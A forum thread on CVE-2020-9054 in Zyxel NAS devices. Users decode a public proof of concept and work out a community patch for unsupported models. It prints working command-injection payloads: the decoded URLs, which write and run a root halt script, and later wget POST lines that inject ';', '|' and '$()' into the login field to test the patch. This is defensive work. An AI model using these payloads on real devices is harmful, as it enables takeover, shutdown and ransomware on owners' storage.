0day Exploit in Zyxel Network Storage Devices CVE-2020-9054

shv
Posts: 60
Registered: Sat 10 Nov 2018, 17:36

0day Exploit in Zyxel Network Storage Devices CVE-2020-9054

Post by shv »


Mijzelf
Posts: 92
Registered: Wed 14 Nov 2018, 19:50

Re: 0day Exploit in Zyxel Network Storage Devices CVE-2020-9

Post by Mijzelf »

Here a proof of concept can be found, which turns off your NAS if it's vulnerable.

When looking at the javascript, it actually tries to access these 3 pages:

Code:

http://' + ip + '/adv,/cgi-bin/weblogin.cgi?username=admin%27%3Becho%20/usr/local/apache/web_framework/%5C%5C%3E%20%2Ftmp%2F1.sh+%23&password=asdf'
http://' + ip + '/adv,/cgi-bin/weblogin.cgi?username=admin%27%3Becho%20bin/executer_su%20/sbin/halt%3E%3E%20%2Ftmp%2F1.sh+%23&password=asdf'
http://' + ip + '/adv,/cgi-bin/weblogin.cgi?username=admin%27%3Bsh%20/tmp/1.sh+%23&password=asdf'
As you can see, directly after the username 'admin' some url encoded data is injected, which translates to

Code:

';echo /usr/local/apache/web_framework/\\> /tmp/1.sh+#
';echo bin/executer_su /sbin/halt >> /tmp/1.sh+#
';sh /tmp/1.sh+#
When I assume that the leading '; and trailing +# are discarded, this creates a file /tmp/1.sh, which contains

Code:

/usr/local/apache/web_framework/bin/executer_su /sbin/halt
and executes that using 'sh'.

As weblogin.cgi is a cgi binary, I think it should be possible to patch it on the NASses which are no longer supported by ZyXEL (NSA325v2 and older). The webserver puts the url stuff in environment variables, and executes the binary. So when another binary (or script) is bindmounted on weblogin.cgi, it can filter the username before it executes the original weblogin.cgi.

(BTW, isn't it nice that there is a binary executer_su which executes everything as root?)

Mijzelf
Posts: 92
Registered: Wed 14 Nov 2018, 19:50

Re: 0day Exploit in Zyxel Network Storage Devices CVE-2020-9

Post by Mijzelf »

Succeeded!

I have added a patch in Tweaks, which filters weblogin.cgi. It works on my NAS520 and NSA325. In both cases the PoC script can shut down the boxes when the patch is not active, and it can't when the patch is active. (BTW, there is a bug in the PoC script. It erroneously claims my NSA325 is down, while it isn't. It tries to load an image which isn't available on fw4.)
The filter removes all '%' from both username and password. So if you are using special characters, which have to be encoded in the URL, it doesn't work. Change your password before enabling the patch.

For the moment I have only uploaded it for fw4, as ZyXEL has patches for fw5.

Rincewind2020
Posts: 2
Registered: Wed 26 Feb 2020, 22:37

Re: 0day Exploit in Zyxel Network Storage Devices CVE-2020-9054

Post by Rincewind2020 »

Thanks: successfully tested for NSA325v2 - working.
Why is Zyxel not able or not willing to fix own mistakes?

Mijzelf
Posts: 92
Registered: Wed 14 Nov 2018, 19:50

Re: 0day Exploit in Zyxel Network Storage Devices CVE-2020-9054

Post by Mijzelf »

Rincewind2020 wrote:
Mon 2 Mar 2020, 09:52
> Thanks: successfully tested for NSA325v2 - working.
You're welcome. Thanks for the feedback.
> Why is Zyxel not able or not willing to fix own mistakes?
Is that a question? Because those boxes are end-of-support. I admit that support is a bit short by ZyXEL, but on the other hand the prices are a lot lower than those of similar boxes from, for instance, Synology. Which leaves you with a box which is, in terms of hardware, still perfectly healthy, but whose software is hardly sufficient anymore.

Mijzelf
Posts: 92
Registered: Wed 14 Nov 2018, 19:50

Re: 0day Exploit in Zyxel Network Storage Devices CVE-2020-9054

Post by Mijzelf »

Cheered too early. The patch filters out all url encoded characters. But in case of a POST no encoding is necessary. The command

Code:

wget http://nas520.lan/adv,/cgi-bin/weblogin.cgi --post-data="username=a';touch /tmp/x+#&password=x"
or

Code:

wget http://nas520.lan/adv,/cgi-bin/weblogin.cgi --post-data="username=a'; | touch /tmp/x+#&password=x"
created a file /tmp/x on my patched nas.

So I've updated the patch, in case of a POST it also filters all ; and | away. Don't know if other characters can be used for the injection either. I have tried &, &&, but these are used as parameter separator, and are for that reason filtered away by weblogin.cgi itself.

If someone can find another way to trigger the bug, please let me know.

Rincewind2020
Posts: 2
Registered: Wed 26 Feb 2020, 22:37

Re: 0day Exploit in Zyxel Network Storage Devices CVE-2020-9054

Post by Rincewind2020 »

Thx for the update!

norm
Posts: 1
Registered: Thu 5 Mar 2020, 19:34

Re: 0day Exploit in Zyxel Network Storage Devices CVE-2020-9054

Post by norm »

Thanks for the patch and thanks for the update. Good work :D

Kuki
Posts: 28
Registered: Mon 6 Jan 2020, 14:50

Re: 0day Exploit in Zyxel Network Storage Devices CVE-2020-9054

Post by Kuki »

Zyxel now offers updated firmware for patching:

Affected model   Standard firmware version
NAS326           Available now. Firmware V5.21(AAZF.7)C0
NAS520           Available now. Firmware V5.21(AASZ.3)C0
NAS540           Available now. Firmware V5.21(AATB.4)C0
NAS542           Available now. Firmware V5.21(ABAG.4)C0

Not for older models:

Affected models that are end-of-support:
  NSA210, NSA220, NSA220+, NSA221, NSA310, NSA310S, NSA320, NSA320S, NSA325 and NSA325v2
Workaround:
  Do not leave the product directly exposed to the internet. If possible, connect it to a security router or firewall for additional protection.

Mijzelf
Posts: 92
Registered: Wed 14 Nov 2018, 19:50

Re: 0day Exploit in Zyxel Network Storage Devices CVE-2020-9054

Post by Mijzelf »

... and yet another update. The command

Code:

wget http://nas520.lan/adv,/cgi-bin/weblogin.cgi --post-data="username=a'>\$(touch /tmp/x)+#&password=x"
also triggered the bug. So I also filtered away the $.

BTW, on homeforum.zyxel.com you can find two people who have got ransomware on their nas, probably (or hopefully) by this vulnerability.
